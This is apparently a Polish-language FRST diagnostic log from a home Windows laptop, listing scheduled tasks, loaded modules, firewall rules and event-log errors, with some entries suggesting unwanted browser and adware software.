Task: {941500AD-B8E6-4F99-BEDE-E4AD314D89A6} - System32\Tasks\AcerCMUpdateTask2.1.16258 => C:\Program Files (x86)\Acer\Amundsen\2.1.16258\AWC.exe [2016-09-20] ()
Task: {982E8A31-B494-42FC-8CFE-1062953DD965} - System32\Tasks\AcerCloud => C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe [2015-10-15] (Acer)
Task: {9DDAE723-7705-4F4B-8206-8A0F5777B03B} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\platform\McUICnt.exe [2016-12-09] (McAfee, Inc.)
Task: {A5A10279-ED83-4F9B-B97C-F935AF253CF9} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation)
Task: {B0A1AD74-05A7-4252-8130-70601E0180A2} - System32\Tasks\UbtFrameworkService => C:\Program Files\Acer\User Experience Improvement Program\Framework\TriggerFramework.exe [2014-03-13] (TODO: <Company name>)
Task: {C1F9446B-E21E-4DBA-A51F-781328F68EED} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-02] (Microsoft Corporation)
Task: {C3CD0E51-E4FD-4B31-8D43-B10133E5F7A8} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-03-02] (Microsoft Corporation)
Task: {C708875B-767C-4C17-A8F3-15FDF2DBA081} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {E28D7D70-5F9A-4819-90B5-C2819368534A} - System32\Tasks\ACCAgent => C:\Program Files (x86)\Acer\Care Center\LiveUpdateAgent.exe [2016-01-20] ()
Task: {E424E08F-0CA7-43E4-9179-3D1F28CE22E7} - System32\Tasks\Power Button => C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe [2016-03-11] (Acer Incorporated)
Task: {E4277888-B743-4447-A51A-1CAB692AB3B0} - System32\Tasks\FUBTrackingByPLD => C:\OEM\Preload\FubTracking\FubTracking.exe [2015-05-14] ()
Task: {E472647B-821A-4C4B-A583-D147A08B1752} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation)
Task: {EF1DB755-18F4-465E-AF3F-18479D930974} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\Program Files\Windows Defender\\MpCmdRun.exe [2017-03-28] (Microsoft Corporation)
Task: {FC3626F8-D2BF-44C6-BCED-EA83613E8F51} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2017-03-26] (Microsoft Corporation)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)


==================== Skróty =============================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.)

ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=1&click_id=e2fe395430f173bfde38c2993e006e118be6b507

==================== Załadowane moduły (filtrowane) ==============

2016-07-16 13:42 - 2016-07-16 13:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-04-12 11:11 - 2017-03-28 08:22 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-05-19 18:11 - 2015-05-19 18:11 - 00007680 _____ () C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe
2016-12-07 17:34 - 2016-12-07 17:34 - 00066872 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2017-02-28 16:19 - 2017-02-28 16:19 - 00102064 _____ () C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe
2017-02-28 16:20 - 2017-02-28 16:20 - 00141488 _____ () C:\Program Files (x86)\Amazon\Amazon Assistant\aaLoader64.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 00369208 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-11-25 17:35 - 2016-06-15 03:14 - 00289848 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 01148984 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 03613240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2017-02-03 17:07 - 2015-09-24 15:57 - 00574464 _____ () C:\Program Files (x86)\My Connection\ApplicationController.exe
2017-04-19 18:33 - 2017-04-20 20:20 - 02271520 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2017-04-19 18:33 - 2017-04-20 20:20 - 02267600 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2016-12-07 17:34 - 2016-12-07 17:34 - 00107832 _____ () C:\WINDOWS\SysWOW64\PnkBstrB.exe
2017-03-01 12:13 - 2016-12-29 15:16 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 02667576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 01990200 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 01842232 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-11-25 17:36 - 2016-06-15 03:14 - 00208952 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2016-11-25 17:35 - 2016-06-15 03:14 - 00035896 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-11-25 17:35 - 2016-06-15 03:14 - 00921656 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2017-04-12 11:11 - 2017-03-28 08:22 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2017-03-14 22:31 - 2017-03-04 08:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-14 22:31 - 2017-03-04 08:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-14 22:31 - 2017-03-04 08:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-04-12 11:10 - 2017-03-28 07:08 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-04-12 11:10 - 2017-03-28 07:11 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-08-18 10:02 - 2015-05-14 09:10 - 00030976 _____ () C:\OEM\Preload\FubTracking\FubTracking.exe
2016-01-20 20:50 - 2016-01-20 20:50 - 04644256 _____ () C:\Program Files (x86)\Acer\Care Center\ACCStd.exe
2016-11-21 10:41 - 2016-11-21 10:41 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-14 22:30 - 2017-03-04 08:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-04-10 20:11 - 2017-04-10 20:15 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-04-10 20:11 - 2017-04-10 20:15 - 00189952 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-02-03 17:07 - 2014-11-13 17:52 - 00011362 _____ () C:\Program Files (x86)\My Connection\mingwm10.dll
2017-02-03 17:07 - 2014-11-13 17:52 - 00043008 _____ () C:\Program Files (x86)\My Connection\libgcc_s_dw2-1.dll
2017-02-03 17:07 - 2014-11-13 17:51 - 02537472 _____ () C:\Program Files (x86)\My Connection\QtCore4.dll
2017-02-03 17:07 - 2015-09-24 15:55 - 01054208 _____ () C:\Program Files (x86)\My Connection\Common.dll
2017-02-03 17:07 - 2014-11-13 17:51 - 09814016 _____ () C:\Program Files (x86)\My Connection\QtGui4.dll
2017-02-03 17:07 - 2014-11-13 17:51 - 01140224 _____ () C:\Program Files (x86)\My Connection\QtNetwork4.dll
2016-08-18 09:33 - 2016-06-15 03:14 - 00020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2015-06-24 10:07 - 2015-06-24 10:07 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2015-10-15 20:56 - 2015-10-15 20:56 - 00201568 _____ () C:\Program Files (x86)\Acer\Acer Portal\curllib.dll
2015-10-15 20:56 - 2015-10-15 20:56 - 00118112 _____ () C:\Program Files (x86)\Acer\Acer Portal\OpenLDAP.dll
2016-08-15 19:03 - 2016-08-15 19:03 - 00202456 _____ () C:\Program Files (x86)\Acer\abPhoto\curllib.dll
2016-08-15 19:05 - 2016-08-15 19:05 - 00654000 _____ () C:\Program Files (x86)\Acer\abPhoto\sqlite3.dll
2016-08-15 19:05 - 2016-08-15 19:05 - 00641240 _____ () C:\Program Files (x86)\Acer\abPhoto\tag.dll
2016-08-15 19:04 - 2016-08-15 19:04 - 00119000 _____ () C:\Program Files (x86)\Acer\abPhoto\OpenLDAP.dll
2017-03-01 12:23 - 2017-03-01 12:23 - 00015064 _____ () C:\WINDOWS\assembly\GAC_MSIL\MyService\1.0.0.1__2dfa3f50f0bed57d\MyService.dll
2016-08-30 16:09 - 2016-08-30 16:09 - 00013016 _____ () C:\Program Files (x86)\Acer\AOP Framework\ServiceInterface.dll
2016-08-30 16:05 - 2016-08-30 16:05 - 00277856 _____ () C:\Program Files (x86)\Acer\AOP Framework\libcurl.dll
2017-02-28 16:23 - 2017-02-28 16:23 - 00116912 _____ () C:\Program Files (x86)\Amazon\Amazon Assistant\aaLoader.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)


==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service"

==================== Powiązania plików (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)

HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Classes\regfile: regedit.exe "%1" <===== UWAGA

==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)

IE trusted site: HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\...\amazon.com -> hxxps://amazon.com

==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2015-10-30 09:24 - 2017-04-02 23:15 - 00000861 ____A C:\WINDOWS\system32\Drivers\etc\hosts


0.0.0.1   mssplus.mcafee.com

==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Control Panel\Desktop\\Wallpaper -> c:\users\emil\desktop\zdjęcia\12986483_239163373105190_1185582304_o.jpg
DNS Servers: 192.168.2.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==


==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{039F9D25-EDED-4A9C-AFD7-90C3534D04D7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{A5AA757B-C1ED-415E-B787-E6597951AAF3}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{810A60AD-44F4-4F17-9132-22232C1EB2C0}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{7043FAFD-2A69-4C74-AE52-CAB07337CEA0}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{D7797A0C-546C-40A8-A74C-C3136A9DCEC1}] => (Allow) C:\Program Files (x86)\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{156EBC91-05C9-4005-ABAA-ADD491A4DFF7}] => (Allow) C:\Program Files (x86)\The Sims 4\Game\Bin\TS4.exe
FirewallRules: [{1BAA21A8-62F1-429A-A534-6FB086F6A8CE}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{5572CBD3-1CFB-455F-A0E2-F30F3F62D4F2}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe
FirewallRules: [{6543267D-1115-4370-88BA-8201E35D9E99}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe
FirewallRules: [{017CF767-CC24-4E73-BBD6-6E7CE50E903B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12Agent.exe
FirewallRules: [{901B8B67-32E1-4EF7-88E2-279458BF1BEC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
FirewallRules: [{ACDC2F93-9B31-454B-9D25-60799B38D0C3}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMR\PowerDVD12DMREngine.exe
FirewallRules: [{63DE445A-8D50-45A0-87C4-466E80F0D8DC}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe
FirewallRules: [{970183A0-20DE-4C83-96BC-24E4E922C0DD}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{B5C306DD-2D57-4E2F-9637-133F7789618D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{283B4201-DE50-4D62-8CE3-F4E18B6D5894}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{58191D1B-321C-4F84-A3B0-7DB904A1E136}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{2A8FFF8B-D136-4CA3-ABCF-05D170B4D642}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{78B9D49C-ECF2-4D85-B090-3E9A79E801DA}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe
FirewallRules: [{4FBCDDD8-C04A-4986-BD2B-DC00A2443DE1}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe
FirewallRules: [{A76AF19C-95BD-4659-B2FE-B5E2E23C6E3B}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe
FirewallRules: [{E7171E90-6D8C-47E8-9C77-E1BBE2ECB2E0}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe
FirewallRules: [{90F8E26B-FFAC-41AA-9EB1-FED13BC6A443}] => (Allow) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe
FirewallRules: [{3C2C53B6-E8E1-4E28-9417-E9EC2D793987}] => (Allow) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe
FirewallRules: [{53BA646B-5112-43D4-BCA2-DFE1B3F6D2D3}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{9C35B053-0376-4B18-BE87-98ECC0964784}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{5885212C-9E2A-436F-BD66-E0DBFB01798E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4E38067E-4FEA-487B-9F1D-EFAAB159EA77}] => (Allow) C:\Users\Emil\AppData\Local\Programs\Opera\44.0.2510.23876\opera.exe
FirewallRules: [{F7732D69-5F2B-49EF-A088-0C5F55CD4590}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abd100_46unp9zutxx46unp9zut.dat
FirewallRules: [{250D5170-77A3-49BE-A6F9-959AEB7F445C}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abd100_46unp9zutxx46unp9zut.dat
FirewallRules: [{6B452E6C-FC12-4789-8ECD-60201D3B8758}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{D0DF2BF7-4CE5-494A-9206-37D9BFD681A1}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{CCBCC04A-35E9-42C6-AAB2-CF119B915162}] => (Allow) C:\Program Files (x86)\Boxbob\Application\chrome.exe

==================== Punkty Przywracania systemu =========================

UWAGA: Przywracanie systemu jest wyłączone

==================== Wadliwe urządzenia w Menedżerze urządzeń =============


==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (04/22/2017 01:02:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-PH67M221)
Description: Aktywacja aplikacji Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy!App nie powiodła się. Błąd: -2147023170. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa.

Error: (04/22/2017 01:02:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: BackgroundTaskHost.exe, wersja: 10.0.14393.0, sygnatura czasowa: 0x57899bb2
Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 10.0.14393.1066, sygnatura czasowa: 0x58d9ef32
Kod wyjątku: 0x00000004
Przesunięcie błędu: 0x0000000000033c58
Identyfikator procesu powodującego błąd: 0x6e8
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2bb57ea44e21b
Ścieżka aplikacji powodującej błąd: C:\WINDOWS\System32\BackgroundTaskHost.exe
Ścieżka modułu powodującego błąd: C:\WINDOWS\System32\KERNELBASE.dll
Identyfikator raportu: dd2e57e5-a321-4beb-a35c-f94e046414f0
Pełna nazwa pakietu powodującego błąd: Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy
Identyfikator aplikacji względem pakietu powodującego błąd: App

Error: (04/22/2017 12:58:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: ShellExperienceHost.exe, wersja: 10.0.14393.447, sygnatura czasowa: 0x5819bf85
Nazwa modułu powodującego błąd: JumpViewUI.dll, wersja: 10.0.14393.953, sygnatura czasowa: 0x58ba5925
Kod wyjątku: 0xc0000409
Przesunięcie błędu: 0x0000000000018cdc
Identyfikator procesu powodującego błąd: 0x2d48
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2bb571ac375e0
Ścieżka aplikacji powodującej błąd: C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Ścieżka modułu powodującego błąd: C:\Windows\ShellExperiences\JumpViewUI.dll
Identyfikator raportu: 113d7585-980d-400e-bb77-c591bf6bd7a3
Pełna nazwa pakietu powodującego błąd: Microsoft.Windows.ShellExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy
Identyfikator aplikacji względem pakietu powodującego błąd: App

Error: (04/22/2017 12:56:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: ShellExperienceHost.exe, wersja: 10.0.14393.447, sygnatura czasowa: 0x5819bf85
Nazwa modułu powodującego błąd: JumpViewUI.dll, wersja: 10.0.14393.953, sygnatura czasowa: 0x58ba5925
Kod wyjątku: 0xc0000409
Przesunięcie błędu: 0x0000000000018cdc
Identyfikator procesu powodującego błąd: 0x1708
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2bb56b7543c52
Ścieżka aplikacji powodującej błąd: C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Ścieżka modułu powodującego błąd: C:\Windows\ShellExperiences\JumpViewUI.dll
Identyfikator raportu: eeb5fc7c-35b8-4e2a-8f7c-aa64714edafe
Pełna nazwa pakietu powodującego błąd: Microsoft.Windows.ShellExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy
Identyfikator aplikacji względem pakietu powodującego błąd: App

Error: (04/22/2017 12:09:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: AdwCleaner.exe, wersja: 6.0.4.5, sygnatura czasowa: 0x58da8d8e
Nazwa modułu powodującego błąd: AdwCleaner.exe, wersja: 6.0.4.5, sygnatura czasowa: 0x58da8d8e
Kod wyjątku: 0xc0000005
Przesunięcie błędu: 0x00022d82
Identyfikator procesu powodującego błąd: 0x4af0
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2bb4fb140e1da
Ścieżka aplikacji powodującej błąd: C:\Users\Emil\Downloads\AdwCleaner.exe
Ścieżka modułu powodującego błąd: C:\Users\Emil\Downloads\AdwCleaner.exe
Identyfikator raportu: db70781a-8c74-4493-828f-28a543a1c845
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/22/2017 12:03:39 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-PH67M221)
Description: Aktywacja aplikacji Microsoft.BingWeather_8wekyb3d8bbwe!App nie powiodła się. Błąd: -2144927148. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa.

Error: (04/22/2017 12:01:58 PM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (04/22/2017 12:01:42 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-PH67M221)
Description: Aktywacja aplikacji Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy!App nie powiodła się. Błąd: -2144927142. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa.

Error: (04/22/2017 12:01:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: BackgroundTaskHost.exe, wersja: 10.0.14393.0, sygnatura czasowa: 0x57899bb2
Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 10.0.14393.1066, sygnatura czasowa: 0x58d9ef32
Kod wyjątku: 0x00000004
Przesunięcie błędu: 0x0000000000033c58
Identyfikator procesu powodującego błąd: 0x1fb8
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2bb4f67cabc1e
Ścieżka aplikacji powodującej błąd: C:\WINDOWS\System32\BackgroundTaskHost.exe
Ścieżka modułu powodującego błąd: C:\WINDOWS\System32\KERNELBASE.dll
Identyfikator raportu: 32aa4e57-c3c0-446a-a208-5ab4dbdabb97
Pełna nazwa pakietu powodującego błąd: Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy
Identyfikator aplikacji względem pakietu powodującego błąd: App

Error: (04/22/2017 12:38:13 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-PH67M221)
Description: Aktywacja aplikacji Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App nie powiodła się. Błąd: -2144927141. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa.


Dziennik System:
=============
Error: (04/22/2017 12:53:54 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Usługa Apple Notifications Service zakończyła działanie; wystąpił następujący błąd:
Nie można odnaleźć określonego modułu.

Error: (04/22/2017 12:53:20 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID
{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}
i identyfikatorem aplikacji APPID
{F72671A9-012C-4725-9D2F-2A4D32D65169}
użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (04/22/2017 12:50:23 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT)
Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
i identyfikatorem aplikacji APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
użytkownikowi ZARZĄDZANIE NT\SYSTEM o identyfikatorze zabezpieczeń SID (S-1-5-18) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe.

Error: (04/22/2017 12:39:22 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Menedżer sterowania usługami próbował podjąć akcję korekcyjną (Uruchom usługę ponownie) po nieoczekiwanym zakończeniu usługi McAfee SiteAdvisor Service, ale ta akcja nie powiodła się przy następującym błędzie:
Jedno wystąpienie usługi już działa.
.

Error: (04/22/2017 12:16:46 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa McAfee SiteAdvisor Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 2. W przeciągu 30000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.

